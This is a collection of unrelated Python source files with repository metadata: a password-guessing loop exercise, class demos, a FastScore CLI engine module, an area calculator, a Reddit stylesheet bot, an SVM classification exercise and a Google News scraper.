5a9a8f5fd9845d346566bf5d8ce0735ccaeac327 | Python | ItsMrTurtle/PythonChris | /Unit 4 For Loops/Lesson18.3-Break_Statements.py | UTF-8 | 379 | 3.375 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
"""
Created on Thu Apr 30 23:20:43 2020
@author: Christopher Cheng
"""
guess = input("Enter the password: ")
code = "turtle"
trial = 1
maxTries = 3
while guess != code:
if trial >= maxTries:
break
trial +=1
guess = input("Enter again: ")
if (trial >= maxTries):
print("Took too long...")
else:
print("Nice, you got it")
| true |
73e60adf797b7db06ef152b8ba911e1126e80e76 | Python | baur100/python1 | /lesson14/main.py | UTF-8 | 458 | 2.75 | 3 | [] | no_license | from lesson14.pc import Pc
from lesson14.tree import Tree
from lesson14.cat import Cat
from lesson14.dog import Dog
pc = Pc(16,'i7',1000,'samsung')
print(f"{pc.memory}, {pc.cpu}, {pc.monitor}, {pc.ssd}")
maple = Tree(20,"maple",50)
maple.print_tree()
fir_tree = Tree(10, "fir", 5)
fir_tree.isPine=True
barsik = Cat("Barsik",3)
print(barsik)
# dunder __method_name__
# private _private_method_or_field
# mangling __field_name
doggy = Dog("sharik",50)
| true |
a75f14e3899cba9e2973ea95c0ea28877fc73c62 | Python | modelop/fastscore-cli | /cli/engine.py | UTF-8 | 1,957 | 2.78125 | 3 | [
"Apache-2.0"
] | permissive |
import json
from .colors import tcol
def pause(connect, verbose=False, **kwargs):
engine = connect.lookup('engine')
engine.pause()
if verbose:
print "Engine '%s' paused" % engine.name
def unpause(connect, verbose=False, **kwargs):
engine = connect.lookup('engine')
engine.unpause()
if verbose:
print "Engine '%s' unpaused" % engine.name
def inspect(connect, verbose=False, asjson=False, **kwargs):
engine = connect.lookup('engine')
if asjson:
doc = {'state': engine.state}
print json.dumps(doc, indent=2)
else:
state = engine.state
if verbose:
print "The current engine state is %s." % state
print
print explain_state(state)
elif state == "RUNNING":
print tcol.OKGREEN + state + tcol.ENDC
else:
print state
def reset(connect, verbose=False, **kwargs):
engine = connect.lookup('engine')
engine.reset()
if verbose:
print "Engine '%s' reset" % engine.name
def explain_state(state):
if state == "INIT":
return """\
The engine waits until all required streams are attached and the model is loaded."""
elif state == "RUNNING":
return """\
The engine is reading data from input streams, passing them to model instances,
collecting outputs from the model, and writing them to output streams."""
elif state == "PAUSED":
return """\
No data processing is taking place."""
elif state == "PIGGING":
return """\
The engine follows a PIG control record though the data pipeline. Typically, the
state is short-lived."""
elif state == "FINISHING":
return """\
All input stream reached EOF but data processing by model instances
continues."""
elif state == "FINISHED":
return """\
The data processing is complete. All streams are at EOF. All model instances are
idle. Reset the engine to load another model."""
| true |
2629ce7271aac14e6e8b5771b034ee2eb2f39416 | Python | Yaeger42/PlatziChallenges | /cuartoNivel/Challenge7.py | UTF-8 | 1,641 | 4.25 | 4 | [] | no_license | from math import pi, sqrt
def triangleArea(base, height):
return (base * height) / 2
def squareArea(side):
return side**2
def pentagonArea(p, a):
return (p * a)/2
def rectangleArea(base, height):
return base * height
def circleArea(radius):
return pi * (radius**2)
def menu():
print("1. Calculate the area of a triangle")
print("2. Calculate the area of a square")
print("3. Calculate the area of a pentagon")
print("4. Calculate the area of a rectangle")
print("5. Calculate the area of a circle")
option = int(input("Enter an option with the desired number: "))
while option <= 5:
if option == 1:
base = int(input("Enter the base of the triangle: "))
height = int(input("Enter the height of the triangle: "))
print(triangleArea(base, height))
elif option == 2:
side = int(input("Enter one size of the square: "))
print(squareArea(side))
elif option == 3:
p = float(input("Enter the pentagon's perimeter: "))
a = float(input("Enter the pentagon's apothem: "))
print(pentagonArea(p, a))
elif option == 4:
b = int(input("Enter the base of the rectangle: "))
height = int(input("Enter the height of the rectangle: "))
print(rectangleArea(b, height))
elif option == 5:
r = int(input("Enter the radius of the circle: "))
print(circleArea(r))
else:
option = int(input("Enter a valid option: "))
def main():
menu()
if __name__ == '__main__':
main()
| true |
6ac4b9d293115d76b749f5bc23ac00f50dc02ba3 | Python | LonMcGregor/LonMBot | /cssbot.py | UTF-8 | 3,932 | 2.609375 | 3 | [] | no_license | import praw
import json
import fileinput
import html
import string
#statics
READ_LIMIT = 5
LOG_LOC = 'readmessages'
UPS_LOC = 'up'
SUBREDDIT = 'MonarchyOfEquestria'
TRIGGER = 'MakeName'
#globals
r = praw.Reddit(user_agent = "praw:lonmcgregor.cssmanager:v1;(by /u/LonMcGregor)")
currentlog = []
style = ""
needsUpdating = 0
#log me in function
def login():
pos = 0;
ups = ["", ""]
with fileinput.input(files=(UPS_LOC)) as f:
for line in f:
word = line.rstrip('\n')
ups[pos] = word
pos = pos + 1
print("Logging in...")
r.login(ups[0], ups[1])
print("Logged in.")
#clear the log to just last READ_LIMIT entries
def cleanLog():
print("Cleaning Log")
counter = 0
lines = []
with fileinput.input(files=(LOG_LOC)) as f:
for line in f:
if (counter == 0):
(0==0)
else:
if (counter <= READ_LIMIT):
lines.append(line)
counter = counter + 1
f = open(LOG_LOC, 'w')
for str in lines:
f.write(str)
f.close()
readLog()
#read the log into list
def readLog():
global currentlog
print("Reading log")
currentlog = []
with fileinput.input(files=(LOG_LOC)) as f:
for line in f:
currentlog.append(line.rstrip('\n'))
#write a new entry to the log
def writeToLog(log):
print("Logging... "+ log)
cleanLog()
f = open(LOG_LOC, 'a')
f.write(log+'\n')
f.close()
readLog()
#return the last READ_LIMIT mod mails
def getModMail():
print("Getting modmail")
modreddit = r.get_subreddit(SUBREDDIT)
return r.get_mod_mail(modreddit, limit=READ_LIMIT)
#return the SUBREDDIT's style
def getStyle():
print("Getting stylesheet")
return html.unescape(r.get_stylesheet(SUBREDDIT)['stylesheet'])
#helper function: does an iterable contain an item
def contains(list, item):
try:
list.index(item)
return True
except ValueError:
return False
#check a message and act upon if necessary
def handleMsg(message):
messageid = message.id
print("Handling message "+messageid)
if(not contains(currentlog, messageid)):
if(message.subject == TRIGGER):
if(isValidName(message.body)):
appendToStyle(message.author.id, message.body)
message.reply("Done!")
else:
message.reply("Please send a new message with a valid name. [contains a-z, A-Z, 0-9 and spaces only, less than 30 characters long]")
writeToLog(messageid)
else:
print("Message previously handled")
#check if a new name is valid
def isValidName(name):
name = name.lower()
if(len(name)>30):
return False
for i in range(0, len(name)):
#for each character in name
if (not contains(string.ascii_letters, name[i])):
#if it is not one of letter
if (not contains(string.digits, name[i])):
#if it is not one of number
if(not name[i] == " "):
#if not space
return False
#return false
#return true
return True
#add a new name to the style
def appendToStyle(userid, username):
global style
global needsUpdating
print("Prepping style append for: "+userid+" to "+username)
style = style + '\n .id-t2_' + userid + ':before { content: "' + username + '"; }\n'
style = style + ' .id-t2_' + userid + ':link {color: rgba(0,0,0,0); font-size: 0px; }\n'
needsUpdating = 1
#run the bot
def run():
global style
global mail
style = getStyle()
mail = getModMail()
print("Checking modmail")
for msg in mail:
handleMsg(msg)
if(needsUpdating == 1):
print("Style updating... ")
r.set_stylesheet(SUBREDDIT, style)
readLog()
login()
run() | true |
cbadebee3d837955392845d48e180899dfa42e99 | Python | LucaBarco/Course-01SQIOV-Machine-Learning-And-Artificial-Intelligence | /HW1/venv/Ex04.py | UTF-8 | 2,623 | 2.6875 | 3 | [] | no_license |
from itertools import product
from sklearn.datasets import load_wine
import matplotlib.pyplot as plt
import numpy as np
from sklearn.svm import SVC
from matplotlib.colors import ListedColormap
from sklearn import neighbors, datasets,utils
from sklearn.model_selection import cross_val_score
n_neighbors=1
#load data
data = load_wine()
print(data.feature_names)
#select 2 features
dataSelection=data.data[:,[0,1]]
#print(dataSelection)
size=dataSelection.shape[0]
#split data
dataSelection,validation=utils.shuffle(dataSelection,data.target,random_state=10)
nTraining=int(size*0.5);
nTest=int(size*0.3);
nValidation=int(size*0.2);
#print("T{} T{} V{}".format(nTraining,nTest,nValidation))
trainingData=dataSelection[:nTraining]
testData=dataSelection[nTraining:nTraining+nTest]
validationData=dataSelection[nTraining+nTest:]
targetValues=validation[:nTraining]
np.append(trainingData,validationData)
np.append(targetValues,validation[nTraining:nTraining+nTest])
X=trainingData
y=targetValues
# Plotting decision regions
x_min, x_max = X[:, 0].min() - 1, X[:, 0].max() + 1
y_min, y_max = X[:, 1].min() - 1, X[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, 0.1),
np.arange(y_min, y_max, 0.1))
for i in range (1,3):
f, axarr = plt.subplots(4, 4, sharex='col', sharey='row', figsize=(10, 8))
for idx,par in zip(product([0,1,2,3], [0,1,2,3]),product([0.001*(10**((i-1)*4)),0.01*(10**((i-1)*4)),0.1*(10**((i-1)*4)),1*(10**((i-1)*4))],[0.001*(10**((i-1)*4)),0.01*(10**((i-1)*4)),0.1*(10**((i-1)*4)),1*(10**((i-1)*4))])) :
clf = SVC(C=par[0], kernel='linear', gamma=par[1], probability=True)
clf.fit(trainingData, validation[:nTraining])
Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
axarr[idx[0], idx[1]].contourf(xx, yy, Z, alpha=0.4)
axarr[idx[0], idx[1]].scatter(X[:, 0], X[:, 1], c=y,
s=20, edgecolor='k')
axarr[idx[0], idx[1]].set_title("Kernel SVM C={} Gamma={}".format(par[0],par[1]))
Z_V = clf.predict(validationData)
countV = 0
for i in range(0, Z_V.size):
# print ("Z:{} T:{}".format(Z_V[i], validation[i + nTraining + nTest]))
if (Z_V[i] == validation[i + nTraining + nTest]):
countV = countV + 1
accuracy = countV / nValidation
print("Accuracy of model ", "Kernel SVM C={} Gamma={}".format(par[0],par[1]), " : ", accuracy)
scores = cross_val_score(clf, X, y, cv=5)
print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
plt.show()
| true |
b26a12378141d0107189b2d173f1bd499fdf2b97 | Python | RealJames/python-random-quote | /googlenews.py | UTF-8 | 1,469 | 2.609375 | 3 | [] | no_license | import requests
from bs4 import BeautifulSoup
from urllib.parse import quote
import urllib.parse
search_list = []
keyword = quote('"柯文哲"'.encode('utf8'))
res = requests.get("https://www.google.com.tw/search?num=50&q="+keyword+"&oq="+keyword+"&dcr=0&tbm=nws&source=lnt&tbs=qdr:d")
# 關鍵字多加一個雙引號是精準搜尋
# num: 一次最多要request的筆數, 可減少切換頁面的動作
# tbs: 資料時間, hour(qdr:h), day(qdr:d), week(qdr:w), month(qdr:m), year(qdr:w)
if res.status_code == 200:
content = res.content
soup = BeautifulSoup(content, "html.parser")
items = soup.findAll("div", {"class": "g"})
for item in items:
# title
news_title = item.find("h3", {"class": "r"}).find("a").text
# url
href = item.find("h3", {"class": "r"}).find("a").get("href")
parsed = urlparse.urlparse(href)
news_link = urlparse.parse_qs(parsed.query)['q'][0]
# content
news_text = item.find("div", {"class": "st"}).text
# source
news_source = item.find("span", {"class": "f"}).text.split('-')
news_from = news_source[0]
time_created = str(news_source[1])
# add item into json object
search_list.append({
"news_title": news_title,
"news_link": news_link,
"news_text": news_text,
"news_from": news_from,
"time_created": time_created
})
import practice_counts | true |